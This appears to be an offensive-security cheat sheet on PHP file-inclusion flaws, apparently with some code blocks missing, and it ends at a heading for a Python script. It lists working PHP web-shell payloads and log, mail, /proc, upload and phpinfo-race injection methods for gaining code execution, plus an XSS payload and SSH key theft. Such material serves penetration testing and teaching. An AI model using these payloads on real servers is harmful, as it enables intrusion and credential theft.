**Remote File Inclusion \(RFI\):** The file is loaded from a remote server \(Best: You can write the code and the server will execute it\). In php this is **disabled** by default \(**allow\_url\_include**\).
**Local File Inclusion \(LFI\):** The sever loads a local file.
The vulnerability occurs when the user can control in some way the file that is going to be load by the server.
A list that uses several techniques to find the file /etc/password \(to check if the vulnerability exists\) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt)
### **Windows**
Using theses lists and deleting repetitions I have created a new one:
A list that uses several techniques to find the file /boot.ini \(to check if the vulnerability exists\) can be found [here](https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-win.txt)
### **OS X**
Check the LFI list of linux.
## Basic LFI and bypasses
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=http://myserver.com/phpshellcode.txt\).
#With the next options, by trial and error, you have to discover how many "../" are needed to delete the appended string but not "/etc/passwd" (near 2027)
Here’s list of top 25 parameters that could be vulnerable to local file inclusion \(LFI\) vulnerabilities \(from [link](https://twitter.com/trbughunters/status/1279768631845494787)\):
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
### Wrapper expect://
Expect has to be activated. You can execute code using this.
If the Apache server is vulnerable to LFI inside the include function you could try to access to _**/var/log/apache2/access.log**_, set inside the user agent or inside a GET parameter a php shell like `<?php system($_GET['c']); ?>` and execute code using the "c" GET parameter.
Note that **if you use double quotes** for the shell instead of **simple quotes**, the double quotes will be modified for the string "_**quote;**_", **PHP will throw an error** there and **nothing else will be executed**.
This could also be done in other logs but b**e carefull,** the code inside the logs could be URL encoded and this could destroy the Shell. The header **authorisation "basic"** contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted insithe this header.
### Via Email
Send a mail to a internal account \(user@localhost\) containing `<?php echo system($_REQUEST["cmd"]); ?>` and access to the mail _**/var/mail/USER&cmd=whoami**_
### Via /proc/\*/fd/\*
1. Upload a lot of shells \(for example : 100\)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID of the process \(can be bruteforced\) and $FD the filedescriptor \(can be bruteforced too\)
### Via /proc/self/environ
Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
### Via upload
If you can upload a file, just inject the shell payload in it \(e.g : `<?php system($_GET['c']); ?>` \).
If ssh is active check which user is being used \(/proc/self/status & /etc/passwd\) and try to access **<HOME>/.ssh/id\_rsa**
### Via phpinfo\(\) \(file\_uploads = on\)
To exploit this vulnerability you need: **A LFI vulnerability, a page where phpinfo\(\) is displayed, "file\_uploads = on" and the server has to be able to write in the "/tmp" directory.**
You need to fix the exploit \(change **=>** for **=>**\). To do so you can do:
sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\>/g' phpinfolfi.py
You have to change also the **payload** at the beginning of the exploit \(for a php-rev-shell for example\), the **REQ1** \(this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1\r_\), and **LFIREQ** \(this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char\)
If uploads are allowed in PHP and you try to upload a file, this files is stored in a temporal directory until the server has finished processing the request, then this temporary files is deleted.
Then, if have found a LFI vulnerability in the web server you can try to guess the name of the temporary file created and exploit a RCE accessing the temporary file before it is deleted.
In **Windows** the files are usually stored in **C:\Windows\temp\php<<**
In **linux** the name of the file use to be **random** and located in **/tmp**. As the name is random, it is needed to **extract from somewhere the name of the temporal file** and access it before it is deleted. This can be done reading the value of the **variable $\_FILES** inside the content of the function "**phpconfig\(\)**".
**PHP** uses a buffer of **4096B** and when it is **full**, it is **send to the client**. Then the client can **send****a lot of big requests** \(using big headers\) **uploading a php** reverse **shell**, wait for the **first part of the phpinfo\(\) to be returned** \(where the name of the temporary file is\) and try to **access the temp file** before the php server deletes the file exploiting a LFI vulnerability.
**Python script to try to bruteforce the name \(if length = 6\)**